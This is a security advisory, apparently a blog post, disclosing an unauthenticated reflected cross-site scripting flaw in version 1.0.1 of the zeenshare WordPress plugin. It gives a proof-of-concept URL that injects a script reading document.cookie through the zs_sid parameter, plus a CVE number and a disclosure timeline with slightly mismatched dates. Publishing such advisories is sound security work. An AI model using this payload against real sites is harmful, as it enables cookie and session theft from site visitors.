wp-plugin : zeenshare – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : zeenshare

 

Effected Version : 1.0.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/zeenshare/redirect_to_zeenshare.php?zs_sid=zs_sid%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4606

 
Plugin Description :
 
ZeenShare lies on a mere idea : make your life easier. That's why our portal enables you to annotate
your collaborative documents whether it is a text or not :
you can upload .ppt extensions as well as pdf documents of images.

ZeenShare is a portal to save time and reduce bulk e-mails. Use it to collaborate with your co-woworkers or your client.

Zeenshare wordpress plugin adds to your site the opportunity to registered accounts to put documents directly in
your zeenshare domain, without having to login again.

Leave a Reply

Your email address will not be published. Required fields are marked *